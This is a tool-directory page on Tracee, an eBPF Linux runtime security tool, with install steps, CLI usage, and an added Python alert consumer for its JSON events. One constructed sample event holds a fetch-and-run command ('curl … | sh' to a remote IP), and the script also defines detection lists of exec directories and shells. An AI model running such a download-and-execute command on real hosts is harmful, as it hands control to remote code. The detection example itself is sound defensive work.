tracee
by aquasecurity
Tracee is a Linux runtime security and forensics tool that leverages eBPF to detect and analyze suspicious system behavior in real-time.
Linux Runtime Security and Forensics using eBPF
Primary Use Case
Tracee is primarily used by security engineers and system administrators to monitor Linux hosts and containers for malicious activity and to support forensic investigations. It collects system calls and other kernel events in-kernel with eBPF, which gives deep visibility into process, file and network activity at low overhead (not zero: every traced event still costs CPU and memory, so filter to the events you need on busy hosts).
- Real-time tracing of Linux kernel events using eBPF
- Detection of suspicious behavior and intrusion attempts
- Forensic analysis capabilities for post-incident investigations
- Lightweight and efficient with minimal performance overhead
- CLI-based tool for easy integration into security workflows
- Support for custom detection rules and event filtering
- Open-source with active community support
Installation
- Ensure the kernel supports the eBPF features Tracee relies on. The CO-RE build needs BTF (CONFIG_DEBUG_INFO_BTF=y, visible as /sys/kernel/btf/vmlinux), which only 5.x kernels provide; older kernels may work with a non-CO-RE build that needs matching kernel headers. Check the project's documented minimum version rather than assuming any 4.x kernel will do.
- Install build dependencies: a recent Go toolchain (Tracee itself is written in Go), clang and llvm for the eBPF objects, make, gcc, and libelf-dev
- Clone the repository: git clone https://github.com/aquasecurity/tracee.git
- Navigate to the tracee directory: cd tracee
- Build with make: `make all` (older releases produce dist/tracee-ebpf and dist/tracee-rules; newer ones a single dist/tracee binary)
- Run Tracee as root, or with the capabilities needed to load eBPF programs and attach probes (CAP_BPF, CAP_PERFMON and CAP_SYS_ADMIN on current kernels). The aquasec/tracee container image is the documented alternative to building locally; it must run privileged with the host PID namespace.
Usage
>_ ./tracee-ebpf    Start Tracee with its default event set and table output
>_ ./tracee-ebpf --help    Show available options; flag names changed across releases (the unified tracee binary uses --events and --scope), so check this for your build
>_ ./tracee-ebpf --trace event=execve,execveat    Trace only exec events; filters use key=value syntax (event=, comm=, pid=, uid=, plus container for container-originated events)
>_ ./tracee-ebpf --output json    Emit one JSON object per event, for piping into a parser or SIEM shipper
>_ ./tracee-ebpf --trace comm=bash --trace event=execve    Combine filters: only execve calls made by processes named bash
- Integrate Tracee with SIEM platforms for enriched alerting and correlation.
- Write custom signatures for tracee-rules (Go or Rego) to tailor detection to your threat model; the eBPF collector stays generic, and the rules decide what is suspicious.
- Use Tracee in purple team exercises to validate detection capabilities against red team tactics.
- Deploy Tracee in CI/CD pipelines to catch anomalous behavior during application runtime testing.
- Combine Tracee outputs with automated response tools to enable faster incident containment.
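The JSON output and the SIEM and automated-response tips above assume something consumes Tracee's event stream. The following is an added example, not code from the Tracee project: a small consumer that reads one JSON event per line (as `--output json` emits), applies two execve rules (execution from a temp directory, and a shell spawned inside a container) and prints one alert object per line for a SIEM shipper. The field names used (eventName, processName, processId, userId, hostName, container.id or the older flat containerId, and the args list with name/value entries, here pathname and argv) follow Tracee's JSON layout as assumed here; the sample events, the file name tracee_alerts.py and the directory and shell lists are constructed for the example.

```python
#!/usr/bin/env python3
"""Turn Tracee JSON events into SIEM-ready alerts (added example, not Tracee code).

Assumed invocation (check --help for the flag names of your Tracee build):
    sudo ./dist/tracee-ebpf --output json --trace event=execve | python3 tracee_alerts.py
"""
import json
import sys
from os.path import basename

# Directories a freshly dropped payload typically executes from (constructed list).
UNTRUSTED_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/run/user/")
# Interactive shells that rarely belong inside a production container (constructed list).
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}


def arg(event, name):
    """Return the value of the named entry in Tracee's args list, or None (assumed layout)."""
    for a in event.get("args", []):
        if a.get("name") == name:
            return a.get("value")
    return None


def container_id(event):
    """Accept both the nested container object and the older flat containerId field (assumed)."""
    c = event.get("container")
    if isinstance(c, dict) and c.get("id"):
        return c["id"]
    return event.get("containerId") or ""


def evaluate(event):
    """Apply the two execve rules to one event; return a list of alert dicts (possibly empty)."""
    if event.get("eventName") != "execve":
        return []
    path = arg(event, "pathname") or ""
    argv = arg(event, "argv") or []
    cid = container_id(event)
    base = {
        "host": event.get("hostName", ""),
        "pid": event.get("processId"),
        "uid": event.get("userId"),
        "parent": event.get("processName", ""),  # comm of the process issuing execve
        "container": cid[:12],
        "cmdline": " ".join(argv) if isinstance(argv, list) else str(argv),
        "ts": event.get("timestamp"),
    }
    alerts = []
    if path.startswith(UNTRUSTED_EXEC_DIRS):
        alerts.append({"rule": "exec_from_tmp", "severity": "high", "path": path, **base})
    if cid and basename(path) in SHELLS:
        alerts.append({"rule": "shell_in_container", "severity": "medium", "path": path, **base})
    return alerts


def analyze(lines):
    """Parse JSON lines (one event per line); silently skip anything that is not a JSON object."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        alerts.extend(evaluate(event))
    return alerts


# Constructed sample events in the shape Tracee's JSON output uses; not captured from a real host.
SAMPLE_EVENTS = [
    '{"timestamp":1700000000000000000,"processId":4242,"userId":1000,"processName":"bash","hostName":"web-01","eventName":"execve","returnValue":0,"args":[{"name":"pathname","type":"const char*","value":"/tmp/.x/kworker"},{"name":"argv","type":"const char*const*","value":["kworker","-c","1"]}]}',
    '{"timestamp":1700000000100000000,"processId":5150,"userId":0,"processName":"runc:[2:INIT]","hostName":"web-01","container":{"id":"3f9c2a1b7d6e4c5a8b9f","name":"api","image":"registry.local/api:1.4"},"eventName":"execve","returnValue":0,"args":[{"name":"pathname","type":"const char*","value":"/bin/sh"},{"name":"argv","type":"const char*const*","value":["sh","-c","curl http://198.51.100.7/p | sh"]}]}',
    '{"timestamp":1700000000200000000,"processId":6001,"userId":1000,"processName":"bash","hostName":"web-01","eventName":"execve","returnValue":0,"args":[{"name":"pathname","type":"const char*","value":"/usr/bin/ls"},{"name":"argv","type":"const char*const*","value":["ls","-la"]}]}',
    '{"timestamp":1700000000300000000,"processId":6002,"userId":1000,"processName":"bash","hostName":"web-01","eventName":"openat","returnValue":3,"args":[{"name":"pathname","type":"const char*","value":"/tmp/notes.txt"}]}',
    'not json: a stray line that must be ignored',
]


def main():
    # Read the live stream when piped from Tracee; fall back to the constructed samples otherwise.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_EVENTS
    for alert in analyze(source):
        print(json.dumps(alert))  # one JSON object per line: trivial to ship to a SIEM


if __name__ == "__main__":
    main()
```

Run without a pipe it evaluates the embedded samples and emits two alerts (the execution from /tmp and the shell in the api container); the plain ls and the openat event produce nothing, and the non-JSON line is dropped rather than crashing the consumer, which matters because a parser that dies on one odd line silently blinds the pipeline. A SIEM shipper can tail the output as newline-delimited JSON, and an automated-response hook can key on the rule and container fields.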
Related Tools

rustdesk
rustdesk/rustdesk
An open-source remote desktop application designed for self-hosting, as an alternative to TeamViewer.
osquery
osquery/osquery
SQL powered operating system instrumentation, monitoring, and analytics.
macOS-Security-and-Privacy-Guide
drduh/macOS-Security-and-Privacy-Guide
Community guide to securing and improving privacy on macOS.
How-To-Secure-A-Linux-Server
imthenachoman/How-To-Secure-A-Linux-Server
An evolving how-to guide for securing a Linux server.
Atlas
Atlas-OS/Atlas
🚀 An open and lightweight modification to Windows, designed to optimize performance, privacy and usability.
fail2ban
fail2ban/fail2ban
Daemon to ban hosts that cause multiple authentication errors
